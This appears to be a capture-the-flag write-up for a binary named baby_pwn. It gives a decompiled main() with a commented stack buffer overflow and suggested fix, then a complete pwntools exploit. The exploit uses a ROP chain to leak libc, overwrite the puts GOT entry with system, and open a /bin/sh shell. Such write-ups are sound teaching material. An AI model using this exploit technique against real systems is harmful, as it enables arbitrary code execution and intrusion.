#1. 문제 살펴보기
#2. 문제 분석하기
< main >
/*
 * Decompiler output for the target's main().
 *
 * Defect: `buf` sits 0x100 bytes below the saved rbp (frame comment on the
 * declaration) but read() is allowed to write 0x256 (598) bytes, so up to
 * 0x156 bytes spill past the buffer over the saved rbp and the return
 * address.  read() does not NUL-terminate, so puts() prints until the first
 * 0 byte, which may lie beyond what was read.
 *
 * Mitigation: size the read to the buffer (sizeof buf - 1), check its
 * return value, NUL-terminate, and only then call puts().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+10h] [rbp-100h]: shown as one char; the frame slot is 0x100 bytes below the saved rbp
setvbuf(_bss_start, 0LL, 2, 0LL); // mode 2 is _IONBF (unbuffered); _bss_start is a decompiler symbol, presumably stdout
puts("What do you want me to echo back> ");
read(0, &buf, 0x256uLL); // stack overflow: 0x256 bytes requested into a 0x100-byte region; return value unchecked
puts(&buf); // input is not NUL-terminated; echo runs to the first 0 byte on the stack
return 0;
}
ROP !
#3. Exploit Code
# Exploit script from the write-up, Python 2 + pwntools (`print` statement,
# str payload concatenated with p64() bytes). It relies on the unbounded
# read() in the decompiled main(): 0x100 bytes fill `buf`, 8 more cover the
# saved rbp, and what follows replaces the return address with a ROP chain.
from pwn import*
p = process('./baby_pwn')
# gadget -- 0x40xxxx values appear to be fixed (non-PIE) addresses of this binary
puts_plt = 0x401030
puts_got = 0x404018
read_plt = 0x401040
pop_rdi = 0x401223
pop_rsi_r15 = 0x401221
# exploit
pay = ''
pay += 'a'*0x100 # buf: matches the [rbp-100h] slot in the decompiled main
pay += 'b'*0x8 # sfp: saved rbp
pay += p64(pop_rdi) # ret: return address now points into the chain
pay += p64(puts_got)
pay += p64(puts_plt) # puts(puts_got): leaks the resolved libc address of puts
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(puts_got)
pay += p64(0)
pay += p64(read_plt) # read(0, puts_got, ...): the second input sent below overwrites the GOT entry
pay += p64(pop_rdi)
pay += p64(puts_got+8)
pay += p64(puts_plt) # puts(puts_got+8): calls through the GOT entry just overwritten
p.send(pay)
p.recvuntil('bbbbbbbb')
p.recv(0x4) # skip the rest of the echoed line; puts stops at the first 0 byte of the chain -- verify byte count
puts_libc = u64(p.recv(6).ljust(8,'\x00')) # 6 significant bytes of a 64-bit address, padded to 8
print hex(puts_libc)
libc_base = puts_libc - 526784 # presumably puts's offset in the target's libc; valid only for that build
system = libc_base + 324672 # presumably system's offset in the same libc
p.sendline(p64(system)+'/bin/sh\x00') # consumed by the chain's read(): new GOT value, then the string at puts_got+8
p.interactive()